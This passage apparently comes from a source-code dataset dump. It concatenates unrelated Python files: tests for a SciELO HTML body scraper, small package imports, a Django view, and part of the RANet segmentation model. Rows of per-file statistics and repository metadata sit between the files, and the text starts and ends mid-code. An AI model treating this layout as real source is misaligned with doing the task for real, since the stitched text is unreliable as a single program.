u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000180&pid=S0044-5967200900010001500005&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000182&pid=S0044-5967200900010001500006&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000184&pid=S0044-5967200900010001500007&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000186&pid=S0044-5967200900010001500008&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000188&pid=S0044-5967200900010001500009&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000190&pid=S0044-5967200900010001500010&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000192&pid=S0044-5967200900010001500011&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000194&pid=S0044-5967200900010001500012&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000196&pid=S0044-5967200900010001500013&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000198&pid=S0044-5967200900010001500014&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000200&pid=S0044-5967200900010001500015&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000202&pid=S0044-5967200900010001500016&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]'
]
self.assertEqual(result, expected)
def test_regex_remove_links_ignore_case(self):
import re
data = """<p>ref 1: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">Links</a> ]</p><p>ref 2: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">links</a> ]</p>"""
result = load_body.REMOVE_LINKS_REGEX.sub(' ', data, count=0)
self.assertEqual(result, '<p>ref 1: </p><p>ref 2: </p>')
def test_scrapt_body_line_breaked(self):
data = u"""
<html>
<header></header>
<body>
<div class="content">
<div class="index,en">
<div class="title">Crazy <i>Title</i></div>
<p>Crazy Body</p>
<p>Really Crazy Body</p>
</div>
</div>
</body>
</html>
"""
result = load_body.scrap_body(data, 'en')
self.assertEqual(result, '<div class="title">Crazy <i>Title</i></div> <p>Crazy Body</p> <p>Really Crazy Body</p>')
def test_scrapt_body_not_found_for_a_given_language(self):
data = u"""<html><header></header><body><div class="content"><div class="index,en"><div class="title">Crazy <i>Title</i></div><p>Crazy Body</p><p>Really Crazy Body</p></div></div></body></html>"""
result = load_body.scrap_body(data, 'pt')
self.assertEqual(result, None)
def test_scrapt_body_not_found(self):
data = u"""<html><header></header><body><div class="content"></div></body></html>"""
result = load_body.scrap_body(data, 'pt')
self.assertEqual(result, None)
def test_body_sample_1(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_1.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the beginning of the document
self.assertTrue(u'On the one pot syntheses' in result)
# Text on the end of the document
self.assertTrue(u'Web Release Date: November 26, 2009' in result)
def test_body_sample_2(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_2.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the beginning of the document
self.assertTrue(u'meio para isolamento de' in result)
# Text on the end of the document
self.assertTrue(u'Recebido para publicação em 31-7-1967' in result)
def test_body_sample_3(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_3.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the beginning of the document
self.assertTrue(u'A TRIBUTAÇÃO NA PRODUÇÃO DE CARVÃO VEGETAL' in result)
# Text on the end of the document
self.assertTrue(u'Recebido: 03 de Fevereiro de 2012; Aceito: 14 de Abril de 2014' in result)
def test_body_sample_4(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_4.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the beginning of the document
self.assertTrue(u'Aquarelas de um Brasil' in result)
# Text on the end of the document
self.assertTrue(u'São Paulo, Companhia das Letras.' in result)
def test_body_sample_5(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_5.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the beginning of the document
self.assertTrue(u'Molestia de Carlos Chagas' in result)
# Text on the end of the document
self.assertTrue(u'Full text available only in PDF format' in result)
def test_body_sample_6(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_6.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'pt')
# Text on the beginning of the document
self.assertTrue(u'Editorial' in result)
# Text on the end of the document
self.assertTrue(u'Boa leitura!' in result)
def test_body_sample_7(self):
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_sample_7.html', 'r', encoding='utf-8').readlines()])
result = load_body.scrap_body(data, 'en')
# Text on the beginning of the document
self.assertTrue(u'caso da bacia do Amazonas' in result)
# Text on the end of the document
self.assertTrue(u'com o Embasamento. Universidade Federal' in result)
| 64.906433 | 532 | 0.656906 | 1,591 | 11,099 | 4.487744 | 0.126964 | 0.014006 | 0.042017 | 0.053221 | 0.822689 | 0.818207 | 0.789916 | 0.789636 | 0.789636 | 0.789636 | 0 | 0.091567 | 0.152807 | 11,099 | 170 | 533 | 65.288235 | 0.667766 | 0.044689 | 0 | 0.254902 | 0 | 0.058824 | 0.393785 | 0.171342 | 0 | 0 | 0 | 0 | 0.205882 | 1 | 0.137255 | false | 0 | 0.068627 | 0 | 0.215686 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f8e6fab667d0361f53e9a779db2f1db685a1d2ba | 91 | py | Python | src/barril/basic/fraction/__init__.py | arthursoprana/barril | 87ebd247c3c3fa422f4ab3b5acdefbe9e85145c7 | [
"MIT"
] | 27 | 2018-09-21T18:11:47.000Z | 2021-10-05T23:32:30.000Z | src/barril/basic/fraction/__init__.py | arthursoprana/barril | 87ebd247c3c3fa422f4ab3b5acdefbe9e85145c7 | [
"MIT"
] | 43 | 2018-09-04T18:43:38.000Z | 2021-06-18T20:41:08.000Z | src/barril/basic/fraction/__init__.py | arthursoprana/barril | 87ebd247c3c3fa422f4ab3b5acdefbe9e85145c7 | [
"MIT"
] | 9 | 2018-09-21T14:20:14.000Z | 2020-02-20T11:31:47.000Z | from ._fraction import Fraction # noqa
from ._fraction_value import FractionValue # noqa
| 30.333333 | 50 | 0.802198 | 11 | 91 | 6.363636 | 0.545455 | 0.342857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 91 | 2 | 51 | 45.5 | 0.909091 | 0.098901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
537f22d2d6cbd699923dab0f041f5b6bb0bc166f | 34 | py | Python | tests/urls.py | ShayestehHS/jw_nx | 94d767f85e0a839a3f8f707cb2cb9de1e17447f0 | [
"MIT"
] | null | null | null | tests/urls.py | ShayestehHS/jw_nx | 94d767f85e0a839a3f8f707cb2cb9de1e17447f0 | [
"MIT"
] | null | null | null | tests/urls.py | ShayestehHS/jw_nx | 94d767f85e0a839a3f8f707cb2cb9de1e17447f0 | [
"MIT"
] | null | null | null | from jw_nx.urls import urlpatterns | 34 | 34 | 0.882353 | 6 | 34 | 4.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
538dc0c5b1c3fe5c686957e1f773e6826089c6d4 | 182 | py | Python | WonderPy/core/__init__.py | avrabe/WonderPy | 60d81340bed1085c32803b32209fbbd4c291310a | [
"MIT"
] | 1 | 2019-05-25T16:55:32.000Z | 2019-05-25T16:55:32.000Z | WonderPy/core/__init__.py | avrabe/WonderPy | 60d81340bed1085c32803b32209fbbd4c291310a | [
"MIT"
] | null | null | null | WonderPy/core/__init__.py | avrabe/WonderPy | 60d81340bed1085c32803b32209fbbd4c291310a | [
"MIT"
] | null | null | null | from . import wwBTLEMgr # noqa
from . import wwMain # noqa
from .wwCommands import WWCommands # noqa
from .wwRobot import WWRobot # noqa
from .wwSensors import WWSensors # noqa
| 30.333333 | 42 | 0.752747 | 23 | 182 | 5.956522 | 0.347826 | 0.233577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 182 | 5 | 43 | 36.4 | 0.931973 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
539edb8e07d13e7bcbf8fbd23a14d0ae341a3e7a | 195 | py | Python | hubconf.py | Ivan1248/cutmix-semisup-seg | 0840a733fbf02271bc31a50b1cd800da19cd6fbd | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/cutmix-semisup-seg | 0840a733fbf02271bc31a50b1cd800da19cd6fbd | [
"MIT"
] | null | null | null | hubconf.py | Ivan1248/cutmix-semisup-seg | 0840a733fbf02271bc31a50b1cd800da19cd6fbd | [
"MIT"
] | null | null | null | from architectures.deeplab2 import (
ResNetDeepLab, resnet101_deeplab_coco, resnet101_deeplab_imagenet)
from architectures.deeplab3plus import DeepLabV3Plus, resnet101_deeplabv3plus_imagenet
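# Illustrative usage sketch (assumption: the names imported above are meant to act
# as torch.hub entry points for this repository; not verified here):
#   import torch
#   model = torch.hub.load('Ivan1248/cutmix-semisup-seg', 'resnet101_deeplabv3plus_imagenet')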
| 48.75 | 86 | 0.882051 | 19 | 195 | 8.736842 | 0.578947 | 0.204819 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072626 | 0.082051 | 195 | 3 | 87 | 65 | 0.854749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
53b073e10f21a647bf5021b6704ed91ed5b4c831 | 191 | py | Python | codeswiftr/posts/views.py | bogdan-veliscu/dev-portfolio-website | 43eb323c67f3fd691388e79039e32479c1bc0974 | [
"Apache-2.0"
] | null | null | null | codeswiftr/posts/views.py | bogdan-veliscu/dev-portfolio-website | 43eb323c67f3fd691388e79039e32479c1bc0974 | [
"Apache-2.0"
] | 4 | 2021-03-30T13:40:00.000Z | 2021-09-22T19:12:56.000Z | codeswiftr/posts/views.py | bogdan-veliscu/dev-portfolio-website | 43eb323c67f3fd691388e79039e32479c1bc0974 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render
from django.views.generic import TemplateView
# Create your views here
def latest_posts(request):
return render(request, 'posts/latest_posts.html')
| 21.222222 | 53 | 0.795812 | 26 | 191 | 5.769231 | 0.653846 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13089 | 191 | 8 | 54 | 23.875 | 0.903614 | 0.115183 | 0 | 0 | 0 | 0 | 0.137725 | 0.137725 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
99018e2b3fd11be2bd01fae801e1673345cc9ec9 | 51,720 | py | Python | codes/RANet_model_vj_backup.py | v1viswan/RANet_modifications | 3cecca77bdf6397c00ddf34452d65c0af497bd26 | [
"Apache-2.0"
] | null | null | null | codes/RANet_model_vj_backup.py | v1viswan/RANet_modifications | 3cecca77bdf6397c00ddf34452d65c0af497bd26 | [
"Apache-2.0"
] | null | null | null | codes/RANet_model_vj_backup.py | v1viswan/RANet_modifications | 3cecca77bdf6397c00ddf34452d65c0af497bd26 | [
"Apache-2.0"
] | null | null | null | # ************************************
# Author: Ziqin Wang
# Email: ziqin.wang.edu@gmail.com
# Github: https://github.com/Storife
# ************************************
import torch
import torch.nn as nn
import numpy as np
from numpy.random import normal
from numpy.linalg import svd
from math import sqrt
from torch.nn import functional as f
from torch.nn import functional as F
from torch.autograd import Variable
import random
from torch.nn import DataParallel as DP
from RANet_lib.RANet_Model_imagenet import *
import time
def make_layer2(input_feature, out_feature, up_scale=1, ksize=3, d=1, groups=1):
p = int((ksize - 1) / 2)
if up_scale == 1:
return nn.Sequential(
nn.InstanceNorm2d(input_feature),
nn.ReLU(),
nn.Conv2d(input_feature, out_feature, ksize, padding=p, dilation=d, groups=groups),
)
return nn.Sequential(
nn.InstanceNorm2d(input_feature),
nn.ReLU(),
nn.Conv2d(input_feature, out_feature, ksize, padding=p),
nn.UpsamplingBilinear2d(scale_factor=up_scale),
)
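# Note: make_layer2 builds a pre-activation block, InstanceNorm2d -> ReLU -> Conv2d,
# and appends a bilinear upsampling layer when up_scale != 1 (in that branch the
# dilation and groups arguments are not applied to the convolution).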
class ResBlock2(nn.Module):
def __init__(self, input_feature, planes, dilated=1, group=1):
super(ResBlock2, self).__init__()
self.conv1 = nn.Conv2d(input_feature, planes, kernel_size=1, bias=False, groups=group)
self.bn1 = nn.InstanceNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1 * dilated, bias=False, dilation=dilated, groups=group)
self.bn2 = nn.InstanceNorm2d(planes)
self.conv3 = nn.Conv2d(planes, input_feature, kernel_size=1, bias=False, groups=group)
self.bn3 = nn.InstanceNorm2d(input_feature)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += residual
out = self.relu(out)
return out
class ResBlock_f(nn.Module):
def __init__(self, input_feature, planes, dilated=1, group=1):
super(ResBlock_f, self).__init__()
self.dilated = dilated
self.conv1 = nn.Conv2d(input_feature, planes, kernel_size=1, bias=False, groups=group)
self.bn1 = nn.InstanceNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False, groups=group)
self.bn2 = nn.InstanceNorm2d(planes)
self.conv3 = nn.Conv2d(planes, input_feature, kernel_size=1, bias=False, groups=group)
self.bn3 = nn.InstanceNorm2d(input_feature)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = f.avg_pool2d(out, self.dilated)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += residual
out = self.relu(out)
return out
class MS_Block(nn.Module):
def __init__(self, input_feature, out_feature, d=[1, 2, 4], group=1):
super(MS_Block, self).__init__()
self.l1 = nn.Conv2d(input_feature, out_feature, 3, padding=d[0], dilation=d[0], bias=False, groups=group)
self.l2 = nn.Conv2d(input_feature, out_feature, 3, padding=d[1], dilation=d[1], bias=False, groups=group)
self.l3 = nn.Conv2d(input_feature, out_feature, 3, padding=d[2], dilation=d[2], bias=False, groups=group)
def forward(self, x):
out = self.l1(x) + self.l2(x) + self.l3(x)
return out
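# Note: MS_Block aggregates multi-scale context by summing three 3x3 convolutions
# whose dilation rates are given by d (default [1, 2, 4]).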
class RANet(ResNet101):
def __init__(self, with_relu=0, pretrained=True, type='single_object'):
super(RANet, self).__init__(with_relu=with_relu, pretrained=pretrained)
self.fp16 = False
self.net_type = type
self._init_net()
self.p_1 = make_layer2(256, 256)
self.res_1 = ResBlock2(256, 128, 1)
self.p_2 = make_layer2(256, 128)
self.p_1b = make_layer2(256, 256)
self.res_1b = ResBlock2(256, 128, 1)
self.p_2b = make_layer2(256, 128)
self.ls13 = make_layer2(512, 32, up_scale=1, ksize=1)
self.ls14 = make_layer2(1024, 16, up_scale=2, ksize=1)
self.ls15 = make_layer2(2048, 16, up_scale=4, ksize=1)
self.ls22 = make_layer2(256, 32, up_scale=1, ksize=1)
self.ls23 = make_layer2(512, 16, up_scale=2, ksize=1)
self.ls24 = make_layer2(1024, 16, up_scale=4, ksize=1)
self.ls31 = make_layer2(64, 32, up_scale=1, ksize=1)
self.ls32 = make_layer2(256, 16, up_scale=2, ksize=1)
self.ls33 = make_layer2(512, 16, up_scale=4, ksize=1)
self.R2 = nn.Sequential(make_layer2(128 + 64, 128),
make_layer2(128, 64),
MS_Block(64, 32, d=[1,3,6]),
ResBlock2(32, 16),
nn.UpsamplingBilinear2d(scale_factor=2))
self.R3 = nn.Sequential(make_layer2(32 + 64, 64),
make_layer2(64, 32),
MS_Block(32, 16, d=[1,3,6]),
nn.UpsamplingBilinear2d(scale_factor=2),
ResBlock2(16, 8),
nn.Conv2d(16, 1, 3, padding=1)
)
self.R1 = nn.Sequential(make_layer2(256 + 64 + 1, 256),
make_layer2(256, 256),
MS_Block(256, 128, d=[1,3,6]),
ResBlock2(128, 64),
nn.UpsamplingBilinear2d(scale_factor=2))
self.L4 = make_layer2(1024, 256, ksize=3)
self.L5 = make_layer2(2048, 512, ksize=3)
self.L3 = make_layer2(512, 128, ksize=3)
self.L_g = make_layer2(512 + 256 + 128, 512)
self.rank_A = nn.Sequential(nn.Conv1d(2, 8, 1),
nn.PReLU(),
nn.Conv1d(8, 1, 1),
nn.ReLU())
self.Ranking = nn.Sequential(make_layer2(405, 128), ResBlock2(128, 32, 2), make_layer2(128, 1))
# self.Ranking = nn.Sequential(nn.Conv2d(405, 16, 1),
# nn.InstanceNorm2d(16), nn.ReLU(),
# nn.Conv2d(16, 1, 1, bias=False), nn.ReLU())
def Dtype(self, data):
if self.fp16:
return torch._C._TensorBase.half(data)
else:
return torch._C._TensorBase.float(data)
def _init_net(self):
if self.net_type == 'single_object':
self.forward = self.RANet_Single_forward_eval
print('Single-object mode')
elif self.net_type == 'multi_object':
self.forward = self.RANet_Multiple_forward_eval
print('Multi-object mode')
def set_type(self, type):
if self.net_type != 'single_object' and type == 'single_object':
self.forward = self.RANet_Single_forward_eval
print('Change to single-object mode')
elif self.net_type != 'multi_object' and type == 'multi_object':
self.forward = self.RANet_Multiple_forward_eval
print('Change to multi-object mode')
else:
pass
def corr_fun(self, Kernel_tmp, Feature, KERs=None):
size = Kernel_tmp.size()
if len(Feature) == 1:
Kernel = Kernel_tmp.view(size[1], size[2] * size[3]).transpose(0, 1)
Kernel = Kernel.unsqueeze(2).unsqueeze(3)
if KERs is not None:
Kernel = KERs[0]
corr = torch.nn.functional.conv2d(Feature, Kernel.contiguous())
Kernel = Kernel.unsqueeze(0)
else:
CORR = []
Kernel = []
for i in range(len(Feature)):
ker = Kernel_tmp[i:i + 1]
fea = Feature[i:i + 1]
ker = ker.view(size[1], size[2] * size[3]).transpose(0, 1)
ker = ker.unsqueeze(2).unsqueeze(3)
if KERs is not None:
ker = torch.cat([ker, KERs[i]], 0)
co = f.conv2d(fea, ker.contiguous())
CORR.append(co)
ker = ker.unsqueeze(0)
Kernel.append(ker)
corr = torch.cat(CORR, 0)
Kernel = torch.cat(Kernel, 0)
return corr, Kernel
def to_kernel(self, feature):
size = feature.size()
return feature.view(size[1], size[2] * size[3]).transpose(0, 1).unsqueeze(2).unsqueeze(3).contiguous()
def correlate(self, Kernel, Feature):
corr = torch.nn.functional.conv2d(Feature, Kernel,stride=1)
return corr
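# Minimal sketch of the correlation step used above (variable names and shapes are
# illustrative only): the template feature map of shape (1, C, H, W) is reshaped
# into H*W kernels of shape (H*W, C, 1, 1), so each output channel of the
# convolution is the similarity map of one template location:
#   ker = kernel_feat.view(C, H * W).transpose(0, 1).unsqueeze(2).unsqueeze(3)
#   corr = torch.nn.functional.conv2d(frame_feat, ker)   # -> (1, H*W, h, w)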
def P2masks(self, P, num):
M = []
M.append(self.Dtype((P == 0) + (P > int(num))))
for idx in range(1, num + 1):
M.append(self.Dtype(P == idx))
return M
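# Example of P2masks (illustrative): for a label map P with values {0, 1, 2} and
# num=2 it returns [mask of background/overflow labels, mask of object 1,
# mask of object 2], each with the same shape as P.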
@staticmethod
def bbox_uncrop(img, bbox, size, crop_size): # 4D input
img = F.interpolate(img, size=crop_size[2::], mode='bilinear',align_corners=True)
msk = F.pad(img, (bbox[1], 864 - bbox[3], bbox[0], 480 - bbox[2],))
return msk
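# Note: bbox_uncrop resizes a cropped mask back to the crop's original resolution
# and zero-pads it into the full 480 x 864 frame using the bbox coordinates.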
def RANet_Single_forward_eval(self, x1, Ker, msk2, msk_p, mode=''): # vxd feature * msk *2 _feature_Rf
if mode in ['first', 'encoder']:
# Exact template features
x2 = Ker
base_features2 = self.res_forward(x2)
Kernel_3 = f.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = f.normalize(self.L4(base_features2[3]))
Kernel_5 = f.normalize(f.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = f.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
if mode == 'encoder':
return [Kernel_tmp]
Kernel_tmp = f.adaptive_avg_pool2d(Kernel_tmp, [15, 27])
return [Kernel_tmp]
if msk2.max() > 1:
msk2 = self.Dtype(msk2.ge(1.6))
msk_p = self.Dtype(msk_p.ge(1.6))
# Current frame feature
base_features1 = self.res_forward(x1)
Feature_3 = f.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = f.normalize(self.L4(base_features1[3]))
Feature_5 = f.normalize(f.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = f.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
'''
Kernel_tmp = Ker
m = f.adaptive_avg_pool2d(msk2.detach(), Kernel_tmp.size()[-2::])
Kernel = Kernel_tmp * m.repeat(1, 512, 1, 1)
mb = (1 - m).ge(0.9).float()
Kernel_back = Kernel_tmp * mb.repeat(1, 512, 1, 1).float()
corr, Kerner = self.corr_fun(Kernel, Feature)
corr_b, Kerner_b = self.corr_fun(Kernel_back, Feature)
'''
# Correlation
Kernel = Ker
m = f.adaptive_avg_pool2d(msk2.detach(), Kernel.size()[-2::])
mb = self.Dtype((1 - m).ge(0.9))
h_size = 15
w_size = 27
c_size = h_size * w_size
Correlation, a = self.corr_fun(Kernel, Feature)
# Select FG / BG similarity maps
corr = Correlation * m.view(-1, c_size, 1, 1)
corr_b = Correlation * mb.view(-1, c_size, 1, 1)
# Ranking attention scores
T_corr = f.max_pool2d(corr, 2).permute(0, 2, 3, 1).view(-1, c_size, h_size, w_size)
T_corr_b = f.max_pool2d(corr_b, 2).permute(0, 2, 3, 1).view(-1, c_size, h_size, w_size)
R_map = (f.relu(self.Ranking(T_corr)) * self.Dtype(m != 0)).view(-1, 1, c_size) * 0.2
R_map_b = (f.relu(self.Ranking(T_corr_b)) * mb).view(-1, 1, c_size) * 0.2
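# The ranking module scores every similarity channel (one per template location);
# masking with m / mb keeps only foreground / background channels, and the 0.2
# factor weights the learned ranking score against the raw max similarity added below.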
# Rank & select
co_size = corr.size()[2::]
max_only, indices = f.max_pool2d(corr, co_size, return_indices=True)
max_only = max_only.view(-1, 1, c_size) + R_map
m_sorted, m_sorted_idx = max_only.sort(descending=True, dim=2)
corr = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr, m_sorted_idx)])
# corr = corr[0].index_select(0, m_sorted_idx[0, 0, 0:256]).unsqueeze(0)
max_only_b, indices = f.max_pool2d(corr_b, co_size, return_indices=True)
max_only_b = max_only_b.view(-1, 1, c_size) + R_map_b
m_sorted, m_sorted_idx = max_only_b.sort(descending=True, dim=2)
corr_b = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr_b, m_sorted_idx)])
# corr_b = corr_b[0].index_select(0, m_sorted_idx[0, 0, 0:256]).unsqueeze(0)
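# Keeping only the 256 highest-scoring channels gives the merge net (p_1 / res_1 / p_2)
# a fixed-size input regardless of the template resolution.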
# Merge net
fcorr = self.p_2(self.res_1(self.p_1(f.interpolate(corr, scale_factor=2, mode='bilinear',align_corners=True))))
fcorr_b = self.p_2(self.res_1(self.p_1(f.interpolate(corr_b, scale_factor=2, mode='bilinear',align_corners=True))))
# Decoder
base1 = torch.cat([self.ls13(base_features1[2]),
self.ls14(base_features1[3]),
self.ls15(base_features1[4]),
fcorr,
fcorr_b,
f.adaptive_avg_pool2d(msk_p, fcorr.size()[-2::])], 1)
fea1 = self.R1(base1)
base2 = torch.cat([self.ls22(base_features1[1]),
self.ls23(base_features1[2]),
self.ls24(base_features1[3]),
fea1], 1)
fea2 = self.R2(base2)
base3 = torch.cat([self.ls31(base_features1[0]),
self.ls32(base_features1[1]),
self.ls33(base_features1[2]),
fea2], 1)
fea3 = self.R3(base3)
out_R = f.sigmoid(fea3)
features = []
out = [out_R]
return out, features
def RANet_Multiple_forward_eval(self, x1, Ker, msk2, msk_p, mode='',scale_factor = 0): # vxd feature * msk *2 _feature_Rf
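# Multi-object inference: for each sample in the batch, loop over the object ids in
# msk2 (label 1 = background, 2.. = objects) and run the FG/BG correlation plus the
# decoder once per object; the per-object probability maps are concatenated along
# the channel dimension.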
if mode == 'first':
# Extract template features
x2 = Ker
base_features2 = self.res_forward(x2)
Kernel_3 = f.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = f.normalize(self.L4(base_features2[3]))
Kernel_5 = f.normalize(f.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = f.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
# Kernel_tmp = f.avg_pool2d(Kernel_tmp, 2)
return [Kernel_tmp]
# Current frame feature
base_features1 = self.res_forward(x1)
Feature_3 = f.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
